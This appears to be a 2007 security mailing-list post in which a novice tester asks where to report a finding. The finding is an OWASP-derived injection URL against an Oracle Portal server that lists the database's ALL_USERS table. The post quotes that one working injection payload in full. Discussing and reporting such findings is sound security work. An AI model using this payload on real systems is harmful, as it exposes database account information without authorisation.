Hi,
This is my first time doing a web application
assessment. I was reading reading an article about
Oracle assessment in OWASP and tried one of their
examples. To my surprise, by typing the URL below
on my web browser, revealed all the information
about ALL_USERS. I wonder what I can do with this
finding? Maybe you can point me to the proper
mailing list..
http://login.server.com/pls/orasso/orasso.home?);OWA_UTIL.CELLSPRINT(;1);--=SELECT+*
+FROM+ALL_USERS
Thanks
____________________________________________________________________________________
Pinpoint customers who are looking for what you sell.
http://searchmarketing.yahoo.com/
-------------------------------------------------------------------------
Sponsored by: Watchfire
Cross-Site Scripting (XSS) is one of the most common application-level
attacks that hackers use to sneak into web applications today. This
whitepaper will discuss how traditional XSS attacks are performed, how to
secure your site against these attacks and check if your site is protected.
Cross-Site Scripting Explained - Download this whitepaper today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=701700000009405
-------------------------------------------------------------------------
Received on Oct 04 2007
Intro
